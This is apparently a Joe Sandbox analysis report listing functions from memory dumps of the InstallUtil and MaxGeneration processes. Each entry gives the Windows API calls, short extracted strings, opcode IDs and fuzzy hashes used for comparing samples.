                                                                        • CreateActCtxA.KERNEL32(?), ref: 02687421
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 256be3335e7dd67ac44a4344bd84590faed6835d22247ba83a7ca975c8f56afd
                                                                        • Instruction ID: f544186203702c34cdbc2fe509c3058274916f370dcf10481bfe99d9bbe434e5
                                                                        • Opcode Fuzzy Hash: 256be3335e7dd67ac44a4344bd84590faed6835d22247ba83a7ca975c8f56afd
                                                                        • Instruction Fuzzy Hash: 2641E0B0C0061DCFDB24DFA9C944B9EFBB5BF48304F24816AD418AB255DB75698ACF90

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0268680F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 3d8d47ef233019010613ede693be51de490a8a79df3eea283381dcf29105232e
                                                                        • Instruction ID: e3b39fda7f9e3346b78ef48ad54440270b2711b3d5853577daaec4dbc46b4316
                                                                        • Opcode Fuzzy Hash: 3d8d47ef233019010613ede693be51de490a8a79df3eea283381dcf29105232e
                                                                        • Instruction Fuzzy Hash: A521E3B5D00248DFDB10CF99D584ADEBFF5EB48310F14801AE958A7350D374A945CFA0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0268680F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: b7f77f5e4306a3cff7adc313507235596cdcff501e8aa56cc47b1cce1df356e6
                                                                        • Instruction ID: 8f8b6cb554444706ffcc2e6766284916f6e23a66cf856c5cbaafa83e2944e7a6
                                                                        • Opcode Fuzzy Hash: b7f77f5e4306a3cff7adc313507235596cdcff501e8aa56cc47b1cce1df356e6
                                                                        • Instruction Fuzzy Hash: 6A21C4B5D002589FDB10DF9AD984ADEBFF8FB48320F14841AE958A7350D374A944CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Pl^q
                                                                        • API String ID: 0-2831078282
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0268C25E
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq
                                                                        • API String ID: 0-149360118
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Pl^q
                                                                        • API String ID: 0-2831078282
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q
                                                                        • API String ID: 0-1614139903
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: xbq
                                                                        • API String ID: 0-73991425
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d7cdaaf6cdf3b9b5ede791f80ca38b7ee91568ac1b97ee763273fc83694d674
                                                                        • Instruction ID: f471ca3b0055c380a85a48aa7bc348183de9195b657c13f377981381cf07748b
                                                                        • Opcode Fuzzy Hash: 8d7cdaaf6cdf3b9b5ede791f80ca38b7ee91568ac1b97ee763273fc83694d674
                                                                        • Instruction Fuzzy Hash: DF41AC71B00719CFCB64DFB8D94429ABBF2EF84350B04896ED15AC7B94DA30E945CB82
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 17d439b5da374b071dd48d1292d67769251956d1e3e14782068793665e301dcb
                                                                        • Instruction ID: 1ccede247d8c08f8709f4a1485df66218b59ac22c7fa8193aa64a98989b1e2c2
                                                                        • Opcode Fuzzy Hash: 17d439b5da374b071dd48d1292d67769251956d1e3e14782068793665e301dcb
                                                                        • Instruction Fuzzy Hash: 9141F3B5B002099FCB15DF68D905AAEBBB6EF88710F10856AE605DB290DB31E906CB51
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4b2c939c499d0b9749332443b1844b95d812b93ae8562b035da9b0ffa2af597
                                                                        • Instruction ID: d707c0fcb22fecfa9c2bb3d320931dafef5bf8769b9ab5769d7121fe4d5a3ec6
                                                                        • Opcode Fuzzy Hash: b4b2c939c499d0b9749332443b1844b95d812b93ae8562b035da9b0ffa2af597
                                                                        • Instruction Fuzzy Hash: 774139B1A007499FCB25CFA9C944A6ABBF1BF98304F14C55DD582D7A51DB30E904CF52
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09bcbadcdad8ad2ae7dc2d8439813c3f106e58035adf93cb74ea874793a7d066
                                                                        • Instruction ID: 1447aa127c89580101b2b85ce920f5d26051b944ab63a0a279a4a93252940e3a
                                                                        • Opcode Fuzzy Hash: 09bcbadcdad8ad2ae7dc2d8439813c3f106e58035adf93cb74ea874793a7d066
                                                                        • Instruction Fuzzy Hash: A031A374B102588FCB49EF74D8549AEBBB6EFCA700B10815AE416DB351DF349902CBE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00cbdd69ff227119d3040c034bb44fbce8966eedfec3fba4752e787e9b3404cb
                                                                        • Instruction ID: 572a92f577679e86c9fa24ab812aed5aea6e8425ef445558dc0191825a90acf5
                                                                        • Opcode Fuzzy Hash: 00cbdd69ff227119d3040c034bb44fbce8966eedfec3fba4752e787e9b3404cb
                                                                        • Instruction Fuzzy Hash: 1C311975A001199FDF04DFA8D854AEEB7B6FF88350F10806AE905BB3A0DB759D45CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46c591fd8e51b274b639bdb265cffcee5258835a12edb232bf5eee5f502d5c98
                                                                        • Instruction ID: f8ef4bb3195584f2fd840ab1ef6a86d79c3f3a1cd98936917e08312ef23fe261
                                                                        • Opcode Fuzzy Hash: 46c591fd8e51b274b639bdb265cffcee5258835a12edb232bf5eee5f502d5c98
                                                                        • Instruction Fuzzy Hash: 40316134B105188FCB48EF68D994A6EBBB6EFC9700F108159E516DB354DF749902CBD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e46f888a6661c59a7cecefcace6f6c513842e677442bdb120a8b54607d3898c4
                                                                        • Instruction ID: 46c908cf3cd52add98c049be1a2a73cd2884649e012bc3f41d47f0c42c44ab3d
                                                                        • Opcode Fuzzy Hash: e46f888a6661c59a7cecefcace6f6c513842e677442bdb120a8b54607d3898c4
                                                                        • Instruction Fuzzy Hash: 71219271A00119AFDB05DFA8C8449EE7BBAEF8C321F148229E411B7394DF359C45CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916353609.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a6d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c969fce42665a1452e8db47d08b884cd073be00d5a914677056d953303d36d0f
                                                                        • Instruction ID: 5da10de24f5b7fa45e5a37c7b3c7a78ff33e36e1b7db8bad9158c9e53b4a61d6
                                                                        • Opcode Fuzzy Hash: c969fce42665a1452e8db47d08b884cd073be00d5a914677056d953303d36d0f
                                                                        • Instruction Fuzzy Hash: 71214571A00240DFCB01DF04C9C0B26BFB5FB98358F208169E80A4B656C336D846CAA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916424386.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a7d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 752b5a1a8b88e1fd2d052d5fa9561f7485a75f5029a2d5b532a9dd4e700486b8
                                                                        • Instruction ID: 0e0f53880e9154028189c96850f0a580838a404455536556fb1c600940d4fb00
                                                                        • Opcode Fuzzy Hash: 752b5a1a8b88e1fd2d052d5fa9561f7485a75f5029a2d5b532a9dd4e700486b8
                                                                        • Instruction Fuzzy Hash: ED21DE75604200EFCB14DF24D984B26BBB5EF88314F24C569E80E4B296C33AD847CA61
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d1babe81eb4032409da7945a8b37ac40a40c5daa4fd34d552590ebf0dc808fa4
                                                                        • Instruction ID: 66ebee1ba83d54b6c3772f54038e715397b9fe4c1cdd3e5391ffe7f5775c0af3
                                                                        • Opcode Fuzzy Hash: d1babe81eb4032409da7945a8b37ac40a40c5daa4fd34d552590ebf0dc808fa4
                                                                        • Instruction Fuzzy Hash: 88214C71A00219AFCB15DFA9C4449DEBFB6EF8D320F148269E411A7394DE759881CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916353609.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a6d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                        • Instruction ID: d4c672af4d345c3cf127ea0fc63c831c35f951f2ac76be87e72044c15e5c4346
                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                        • Instruction Fuzzy Hash: C311D376904280CFCB16CF14D5C4B16BF71FB98318F24C6A9D90A4F656C33AD85ACBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee5407a74cf28e00e9edf3b1dba0a9c2e2ec19f3a8958420862d9e5e73e07c4b
                                                                        • Instruction ID: 580e7ae8c2af59ff0ece06f6838490589a99808ebbdd019ec98189b504d848c0
                                                                        • Opcode Fuzzy Hash: ee5407a74cf28e00e9edf3b1dba0a9c2e2ec19f3a8958420862d9e5e73e07c4b
                                                                        • Instruction Fuzzy Hash: DC11CE75300209CF8B19EF34D81883E77AAEFD4691704802AE906CB360DF35CC02C791
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916424386.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a7d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                        • Instruction ID: 47a7d75c30f9f2addbc3b22bc2d10e284224db9141eceb1d8841d7a379e4d30b
                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                        • Instruction Fuzzy Hash: 33118E75504280DFDB15CF14D9C4B15BB71FB44314F24C6AAD84E4B656C33AD85BCB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ac580f0d79c47bd1e27191075102a1a90b89b5207a4cd65481b558df88319b6
                                                                        • Instruction ID: 1350308279954ccb9d431b7a3adcc102d686a3465030201717836d7520bc4b50
                                                                        • Opcode Fuzzy Hash: 1ac580f0d79c47bd1e27191075102a1a90b89b5207a4cd65481b558df88319b6
                                                                        • Instruction Fuzzy Hash: DF112B74A11229DFCB14DB58D994EADBBB5BF48324F150099E506EB3A1CB78EC41CF41
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b72090c91f4da10d8447d12a5249704bdee57ad01398f15092b8642c62d96f5
                                                                        • Instruction ID: 383fbf4fe844cf820f195a465bbf9545fc014aabd6458c01062f25ee4cfa72fa
                                                                        • Opcode Fuzzy Hash: 4b72090c91f4da10d8447d12a5249704bdee57ad01398f15092b8642c62d96f5
                                                                        • Instruction Fuzzy Hash: 2801C0753007408FC32ADB34C894A3A3BA2BFC6310F14865EE1568B6E1DB75E803C780
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dee5e9201c90484203c6f3e39465a858228afd8cd42cd227ad4193531ce7d16e
                                                                        • Instruction ID: a3e31d2ba6462108c72e4c7d957e7e3ec1d660fae98b4199c83842a3352febbb
                                                                        • Opcode Fuzzy Hash: dee5e9201c90484203c6f3e39465a858228afd8cd42cd227ad4193531ce7d16e
                                                                        • Instruction Fuzzy Hash: CE014C713006059FC369DA24C894A2B77E2FBCA354F14866DE5168B790DB75E843C780
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4681b095d47cc10a898b834081f1e15a3b78a180d099192a3d4deb5d498bd253
                                                                        • Instruction ID: 1f64cc6c7223438a798a35a597de9812fe7189036654b0f5d1004d388e85b27e
                                                                        • Opcode Fuzzy Hash: 4681b095d47cc10a898b834081f1e15a3b78a180d099192a3d4deb5d498bd253
                                                                        • Instruction Fuzzy Hash: 1C01A772B001189FDB04DF58D994B99B7F6EF88300F1080B9E609E7391DE71DD458B51
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916353609.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a6d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 229d8efe8d6ea68dec67d5c471897add775b64b9a20f019ed643ad4f0198c699
                                                                        • Instruction ID: 6737cb506e63a0e3bc375a90f95373ac6210431dbca9e4f4108baad5e91c4d94
                                                                        • Opcode Fuzzy Hash: 229d8efe8d6ea68dec67d5c471897add775b64b9a20f019ed643ad4f0198c699
                                                                        • Instruction Fuzzy Hash: 28F0F976600640AF97208F0AD985C23FBBDFBD4770715C56AE84A4B656C671EC41CEA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916353609.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a6d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40e46f1b8f2a7e1bb7b5496e96409a35f2995567cbaa7302091ef042263f1afe
                                                                        • Instruction ID: 35c006b4bbd8177dbb5ad5e75b9cb8e8ee2551215c7249efd0f8eb2d93926e6a
                                                                        • Opcode Fuzzy Hash: 40e46f1b8f2a7e1bb7b5496e96409a35f2995567cbaa7302091ef042263f1afe
                                                                        • Instruction Fuzzy Hash: 18F03775204680AFD325CF06C984C22BFB9FF897607198489E84A8B362C631FC42CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $
                                                                        • API String ID: 0-3993045852
                                                                        • Opcode ID: 0a50119e3ed8af2db9d201fc9c7df5c7ebd23c8449b2b6bb127148cd65088c67
                                                                        • Instruction ID: eea1bbbf321b84fb330d803b0e5f677c43b2313c8c51ec7293be60d9a9d95e29
                                                                        • Opcode Fuzzy Hash: 0a50119e3ed8af2db9d201fc9c7df5c7ebd23c8449b2b6bb127148cd65088c67
                                                                        • Instruction Fuzzy Hash: ED012F7080021EEBCB21CF54C800BE9B7B6FB48304F11869AE51963640EB71AED5DF81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !
                                                                        • API String ID: 0-2657877971
                                                                        • Opcode ID: 53a43625ec9d84689bf06dc777cac53fc62489c7b6936f827ff23ca3e087c17c
                                                                        • Instruction ID: 67bfb352860d57ed506823ca077d43400e2965ed0270131d6b718faf4e8d3f7c
                                                                        • Opcode Fuzzy Hash: 53a43625ec9d84689bf06dc777cac53fc62489c7b6936f827ff23ca3e087c17c
                                                                        • Instruction Fuzzy Hash: B8F01774905224CFDB10CF60CA58BD9B7B2BF4A344F0441DAD149A3281D7B99E86CF41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >
                                                                        • API String ID: 0-325317158
                                                                        • Opcode ID: bee8f42119bf5870be0b200b35714ae30212867db387e29f049cb79ee7e6316c
                                                                        • Instruction ID: a6b0999aaa7bad0fe07b74ce9210916572bc7e4b1cce7358c5a3f179f73b1226
                                                                        • Opcode Fuzzy Hash: bee8f42119bf5870be0b200b35714ae30212867db387e29f049cb79ee7e6316c
                                                                        • Instruction Fuzzy Hash: 86E0EC70604119DFDB22CB54CC58FAA77B6FB48705F0042D4E10D6B6A5C7769E90EF81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6
                                                                        • API String ID: 0-498629140
                                                                        • Opcode ID: baf0494eef72ad729dd3d277c66fd3c4f558aa6ee12830faa0f896e4f7950d80
                                                                        • Instruction ID: 2ec3b81078cc5b68c4906adc95947177c3e06899a3e4ecd591e887786fb70413
                                                                        • Opcode Fuzzy Hash: baf0494eef72ad729dd3d277c66fd3c4f558aa6ee12830faa0f896e4f7950d80
                                                                        • Instruction Fuzzy Hash: B5E092399052299FCB24DF50CA84BD8BBF5AB49308F1480DA840DA7251C736AB86CF00
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 87131283c7e32d17cec00f78d122953a16111c979d3224aa61192499b9131774
                                                                        • Instruction ID: fabf2e7126213e25f6ee4deeb1460b28c947349fee8a213b5fe9421fa0d2416e
                                                                        • Opcode Fuzzy Hash: 87131283c7e32d17cec00f78d122953a16111c979d3224aa61192499b9131774
                                                                        • Instruction Fuzzy Hash: DC420274A10611DFE715CF18D298A99BFF2FB41306F9AC099D1164F262D3BADC85DB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b14225771b1b38e79d609dcae42695eb963b9ea102252fd182e3653a6ae3067
                                                                        • Instruction ID: 85f799578d0fef95447c215c2a9326d3de33250254e1945da9266ca1b485d2af
                                                                        • Opcode Fuzzy Hash: 0b14225771b1b38e79d609dcae42695eb963b9ea102252fd182e3653a6ae3067
                                                                        • Instruction Fuzzy Hash: 7F322470A14611DFE725CF18E658A957FE1FB11306F8AC09AD1164F262D3BADC89DF80
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c67723fa7b2f1d00d46dbe164d6b308a91869c20fcfade34226a36d9810e5d6
                                                                        • Instruction ID: e9e582a815f7ef1ab67ac73774926c9f84d4373d5915d96961ac47152309b3e4
                                                                        • Opcode Fuzzy Hash: 3c67723fa7b2f1d00d46dbe164d6b308a91869c20fcfade34226a36d9810e5d6
                                                                        • Instruction Fuzzy Hash: C512CF79A2420ADFCB10CF68C885AAABBF5FF44300F14856AD646EB351D770E981CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 772e8688ead71b3b6869305b1ce56e1af7f765025107023fa9bc7b220c3de231
                                                                        • Instruction ID: 89129d683d877d4454b3500b502613c3691179958b2e21a05ed29b17012de686
                                                                        • Opcode Fuzzy Hash: 772e8688ead71b3b6869305b1ce56e1af7f765025107023fa9bc7b220c3de231
                                                                        • Instruction Fuzzy Hash: 6A813331A242028FDB28CB78D8547AABBB5FF81341F1885AAC406DB394D774FCA1CB41
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6108e07905825261ffa77af821ff4b6948aecef32f7ca788a361f33285fb3711
                                                                        • Instruction ID: 29e9b6c9854ac167bf51707c1147b941b58b67b44f999a597c0b9b136bd56bd6
                                                                        • Opcode Fuzzy Hash: 6108e07905825261ffa77af821ff4b6948aecef32f7ca788a361f33285fb3711
                                                                        • Instruction Fuzzy Hash: 5F418870C142499FCB24CFA9C594AEEBFF1FF88310F188469E909AB254DB348985CF94
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
